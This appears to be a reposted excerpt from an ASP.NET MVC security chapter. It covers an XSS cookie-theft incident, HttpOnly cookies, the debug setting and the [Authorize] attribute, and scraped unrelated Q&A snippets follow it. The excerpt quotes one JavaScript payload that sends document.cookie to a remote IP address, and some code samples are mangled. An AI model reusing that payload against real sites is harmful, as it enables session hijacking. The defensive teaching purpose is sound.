Jeff used a "whitelist" type of XSS prevention — something he wrote on his own (his "friend" in the post is a Tyler Durden—esque reference to himself). The attacker, in this case, exploited a hole in Jeff's homegrown HTML sanitizer:

"Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:

window.location=" http://1.2.3.4:81/r.php?u="+document.links[1].text+"&l="+document.links[1]+"&c="+document.cookie;

That's right — whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!

In short order, the attacker managed to steal the cookies of the StackOverflow.com users, and eventually Jeff's as well. This allowed the attacker to log in and assume Jeff's identity on the site (which was still in beta) and effectively do whatever he felt like doing. A very clever hack, indeed.

 
 

Preventing Cookie Theft with HttpOnly

The StackOverflow.com attack was facilitated by two things:

  • XSS vulnerability: Jeff insisted on writing his own anti-XSS code. Generally, this is not a good idea, and you should rely on things like BB Code or other ways of allowing your users to format their input. In this case, Jeff opened an XSS hole.

  • Cookie vulnerability: The StackOverflow.com cookies were not set to disallow changes from the client's browser.

You can stop script access to cookies by adding a simple flag: HttpOnly. You can set this in the web. config like so:

Response.Cookies["MyCookie"].Value=" Remembering you…";Response.Cookies["MyCookie].HttpOnly=true;

The setting of this flag simply tells the browser to invalidate the cookie if anything but the server sets it or changes it. This is fairly straightforward, and it will stop most XSS-based cookie issues, believe it or not.

 

Keeping Your Pants Up: Proper Error Reporting and the Stack Trace

Something that happens quite often and is that sites go into production with the debug="true" attribute set in the web.config. This isn't specific to ASP.NET MVC, but it's worth bringing up in the security chapter because it happens all too often.

This setting is found in the web.config and comes along with a nice warning:

<system.web><! "Set compilation debug=" true" to insert debuggingsymbols into the compiled page. Because thisaffects performance, set this value to true onlyduring development.- ><compilation debug=" true">

Hackers can exploit this setting by forcing your site to fail — perhaps sending in bad information to a Controller using a malformed URL or tweaking the query string to send in a string when an integer is required.

When this setting is left on (debug="true") and an exception occurs, the ASP.NET runtime will show a "friendly" error message, which will also show the source code where the error happened. If someone was so inclined, they could steal a lot of your source and find (potentially) vulnerabilities that they could exploit in order to steal data or shut your application down.

This section is pretty short and serves only as a reminder to code defensively and turn that flag off!

 

Securing Your Controllers, Not Your Routes

With ASP.NET Web Forms, you were able to secure a directory on your site simply by locking it down in the web.config:

<location path=" Admin" allowOverride=" false"> <system.web>   <authorization>     <allow roles=" Administrator" />     <deny users="?" />   </authorization> </system.web></location>

This works well on file-based web applications, but ASP.NET MVC is not file-based. As alluded to previously in Chapter 2, ASP.NET MVC is something of a remote procedure call system. In other words each URL is a route, and each route maps to an Action on a Controller.

You can still use the system above to lock down a route, but invariably it will backfire on you as your routes grow with your application.

Using [Authorize] to Lock Down Your Action or Controller

The simplest way to demand authentication for a given Action or Controller is to use the [Authorize] attribute. This tells ASP.NET MVC to use the authentication scheme set up in the web.config (FormsAuth, WindowsAuth, etc.) to verify who the user is and what they can do.

If all you want to do is to make sure that the user is authenticated, you can attribute your Controller or Action with [Authorize]:

[Authorize]public class TopSecretController:Controller

Adding this to your Controller will redirect unauthenticated users to the login page with a RedirectUrl attribute (which uses Routing to figure out the route to the Action the user was trying to access) or will accept them as long as they authenticated.

If you want to restrict access by roles, you can do that too:

[Authorize(Roles=" Level3Clearance,Level4Clearance")]public class TopSecretController:Controller

and you can also authorize by users:

[Authorize(Users=" NinjaBob,Superman")]public class TopSecretController:Controller

It's worth mentioning once again that you can use the Authorize attribute on Controllers or Actions.

 

转自:http://www.cnblogs.com/yan-feng/archive/2010/06/26/1765763

相关问答

更多
  • 你的问题是问一些事情,但我认为项目#1是你正在寻找的答案。 在每个请求的基础上使用Context.Items进行缓存可以吗? 是。 如果在过程中,每个请求,网络农场中的每台计算机都是您的标准,那么Context.Items会为您提供相应的标准。 Context.Items难以测试吗? 就可测试性而言,我会将Context.Items隐藏在某种接口之后。 这样你就可以获得单元测试功能,而无需直接引用Context.Items 。 否则,你需要测试一下Context.Items ? 框架将存储和检索值? 让你的 ...
  • MVC 6是ASP.NET 5的一部分,但由于代码库的一些重大变化,他们决定将其名称从ASP.NET 5更改为ASP.NET Core。 你可以在这里阅读: http : //www.hanselman.com/blog/ASPNET5IsDeadIntroducingASPNETCore10AndNETCore10.aspx MVC 6 was part of ASP.NET 5, but due to some major changes in the code base, they decided t ...
  • 该问题起因于ASP.NET MVC项目的AfterBuild目标中使用的AspNetCompiler MSBuild任务期望引用Web项目的bin文件夹中的dll。 在桌面构建中,bin文件夹是您希望在源树下的地方。 然而,TFS Teambuild将源的输出编译到构建服务器上的不同目录。 当AspNetCompiler任务启动时,找不到bin目录来引用所需的DLL,并且获得异常。 解决方案是修改MVC项目的AfterBuild目标如下:
  • 查看授权属性 ,您可以将其放在整个控制器上,也可以只放在控制器中的特定方法中。 例子: [Authorize(Roles = "Administrator")] public class AdminController : Controller { //your code here } 要么 public class AdminController : Controller { //Available to everyone public ActionResult Index() ...
  • 视频和教程都没问题,但在尝试做某事之前,你不会真正学习。 只是决定做点什么。 它不一定非常棒,你可以开始开发一个分类广告网站。 只要你从专业的角度来看任务。 然后,您将开始寻找需要克服的挑战,并开始寻找您需要的答案。 现实生活中的挑战 教程很棒,但有时它们更适合按需咨询,而不是从封面到封面阅读。 去做就对了 Videos and tutorials are all right, but you won't really learn until you try to do something. Just de ...
  • 我每天都用这种配置运行。 有几个步骤需要经过以确保IIS 7.5(在Win 7上)配置正确。 按照下面的链接使用说明。 尽管它们适用于Vista / IIS 7,但它们仍然有效。 http://learn.iis.net/page.aspx/387/using-visual-studio-2008-with-iis-70/ 让我们知道结果。 For those interested the problem was Skype had captured port 80 so IIS could not use ...
  • 一个“using directive”来创建命名空间的别名? using ExpressionHelper = Microsoft.Web.Mvc.Internal.ExpressionHelper; a "using directive" to create an alias to the namespace ? using ExpressionHelper = Microsoft.Web.Mvc.Internal.ExpressionHelper;
  • 您不需要NUnit.Runners或NUnit.Console NuGet包。 您关注的我的博客上的帖子是使用NUnitLite ,这是在早期使用NUnit编写.NET Core单元测试的唯一方法。 从那以后, dotnet-test-nunit就是你要走的路。 它与Visual Studio集成,允许您使用dotnet test命令从Test Explorer窗口或命令行运行dotnet test 。 您的单元测试项目应该只是一个.NET Core类库,而不是一个控制台应用程序或Web应用程序。 高级步骤 ...
  • 存储在App_Data文件夹中的文件不能直接被客户端访问。 ASP.NET阻止访问它。 所以不需要为这个特殊文件夹添加任何忽略路由,你不能使用像这样的URL /App_Data/Uploads/foo.txt 。 如果你想从这个文件夹提供文件,你需要编写一个控制器动作将从物理位置读取文件并将其返回给客户端: public ActionResult Download(string id) { // use the id and read the corresponding file from it's ...
  • 我会使用DataAnnotations,将成为MVC的一部分,但可以在1.0中进行编译和使用。 http://www.asp.net/learn/mvc/tutorial-39-cs.aspx / M I would use DataAnnotations, is going to be a part of MVC but can be compiled and used in 1.0. http://www.asp.net/learn/mvc/tutorial-39-cs.aspx /M